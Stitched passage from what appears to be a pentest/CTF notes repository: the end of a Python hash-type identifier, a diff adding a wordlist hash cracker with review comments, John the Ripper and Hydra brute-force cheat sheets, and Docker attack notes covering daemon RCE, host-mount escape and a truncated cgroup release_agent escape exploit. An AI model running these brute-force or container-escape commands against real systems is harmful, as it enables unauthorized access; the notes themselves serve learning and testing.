if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass(hash):
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass(hash):
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt(hash):
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername(hash):
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass(hash):
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt(hash):
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt(hash):
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass(hash):
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt(hash):
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass(hash):
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass(hash):
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt(hash):
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass(hash):
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt(hash):
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt(hash):
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass(hash):
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass(hash):
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt(hash):
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass(hash):
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass(hash):
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass(hash):
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass(hash):
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass(hash):
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass(hash):
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass(hash):
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4(hash):
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3(hash):
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix(hash):
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress(hash):
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR(hash):
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160(hash):
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC(hash):
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5(hash):
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit(hash):
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160(hash):
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC(hash):
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1(hash):
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC(hash):
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS(hash):
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2(hash):
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160(hash):
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC(hash):
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt(hash):
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass(hash):
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass(hash):
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt(hash):
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass(hash):
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass(hash):
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass(hash):
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt(hash):
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass(hash):
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt(hash):
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass(hash):
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass(hash):
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt(hash):
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03(hash):
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass(hash):
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass(hash):
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass(hash):
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192(hash):
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC(hash):
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192(hash):
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC(hash):
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1(hash):
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django(hash):
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224(hash):
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC(hash):
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224(hash):
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC(hash):
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256(hash):
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC(hash):
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256(hash):
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC(hash):
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194(hash):
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256(hash):
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC(hash):
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256(hash):
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC(hash):
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass(hash):
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass(hash):
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2(hash):
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM(hash):
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django(hash):
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320(hash):
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC(hash):
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384(hash):
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC(hash):
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s(hash):
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django(hash):
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
jerar.append("121020")
def SHA512(hash):
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC(hash):
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool(hash):
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC(hash):
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122080")
print(logo)
try:
first = str(argv[1])
except:
first = None
while True:
try:
jerar=[]
print("-"*50)
if first:
h = first
else:
h = input(" HASH: ")
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); 
sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
if len(jerar)==0:
print("\n Not Found.")
elif len(jerar)>2:
jerar.sort()
print("\nPossible Hashs:")
print("[+] "+str(algorithms[jerar[0]]))
print("[+] "+str(algorithms[jerar[1]]))
print("\nLeast Possible Hashs:")
for a in range(int(len(jerar))-2):
print("[+] "+str(algorithms[jerar[a+2]]))
else:
jerar.sort()
print("\nPossible Hashs:")
for a in range(len(jerar)):
print("[+] "+str(algorithms[jerar[a]]))
first = None
except KeyboardInterrupt:
print("\n\n\tBye!")
exit()

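--- a/hashes/hash_cracker.py
+++ b/hashes/hash_cracker.py
@@ -0,0 +1,20 @@
+#!/usr/bin/env python
+import hashlib
+import pyfiglet
+print(pyfiglet.figlet_format("md5 cracker"))
+wordlist_location = str(input("Wordlist file location: "))
+hash_input = str(input("Enter hash to be cracked: "))
+with open(wordlist_location, 'rb') as _f:
+for line in _f.readlines():
+line = line.strip()
+hash_ob = hashlib.sha256(line)
+#hash_ob = hashlib.md5(line)
+hashed_pass = hash_ob.hexdigest()
+print(line)
+if hashed_pass == hash_input:
+print("Password found: " + line.decode())
+exit(0)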
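Review bot: `hash_input` is compared verbatim against `hexdigest()`, so a hash pasted with uppercase hex or a trailing space never matches; normalise it once, `hash_input = input("Enter hash to be cracked: ").strip().lower()` (the `str()` wrappers around `input()` are redundant on Python 3). The script also has no miss path: when the wordlist is exhausted it ends silently, so a `print("Not found in wordlist")` after the `with` block would make the outcome explicit. `_f.readlines()` loads the whole wordlist into memory where `for line in _f:` streams it, and `print(line)` on every candidate only adds noise. The banner says "md5 cracker" and the commented-out line suggests MD5 while the active digest is `hashlib.sha256`; either make the algorithm a parameter (e.g. `hashlib.new(algo, line)`) or fix the banner so the two agree.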


@ -0,0 +1,2 @@
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

@ -0,0 +1 @@
Subproject commit 5e1d37c82e8f5fc3588c10d9920c07ae6a71a0ce


@ -0,0 +1,8 @@
# John The Ripper
# Usage
* Example
```
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
```

37
hydra.md Normal file

@ -0,0 +1,37 @@
# Hydra usage
## Examples
* HTTP post form
```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
* HTTP basic auth
```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```
|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
## Parameter
|Option|Decription|
|------|----------|
|-l|Single username|
|-P|Indicates use the following wordlist|
|http-post-form|indicates the method|
|/login url|the login URL|
|:username|the form field where the username is entered|
|^USER^|tells Hydra to use the username from -l|
|password|the formfield where the password is entered|
|^PASS^|tells Hydra to use the wordlist from -P|
|Login|indicates to Hydra the login failed message|
|Login failed|is the login failure message that the form returns|
|F=incorrect|If this word appears on the page, login failed|
|-V| verbose|

1
misc/GitTools Submodule

@ -0,0 +1 @@
Subproject commit 9f1820d33e0051cdfc5572f8b24700bb2430f9df

3
misc/bash.md Normal file

@ -0,0 +1,3 @@
# Shell Scripting
[Bash Cheatsheet](https://devhints.io/bash)

1
misc/docker_sec/dive Submodule

@ -0,0 +1 @@
Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6

117
misc/docker_sec/docker.md Normal file

@ -0,0 +1,117 @@
# Docker Vulnerabilities
## Abusing Registry
* [Registry Doc](https://docs.docker.com/registry/spec/api/)
* Registry is a json API endpoint
* Private registry added in `/etc/docker/daemon.json`
* Can be found by nmap as a service
### Enumeration
* General query
```sh
curl http://test.com:5000/v2/_catalog`
```
* List tags
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
```
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
```sh
find / -name "*sock"
groups
```
* Mount the host volume and chroot to it, need alpine image
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
```sh
nsenter --target 1 --mount sh
```
## Misconfiguration
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
```sh
capsh --print
```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
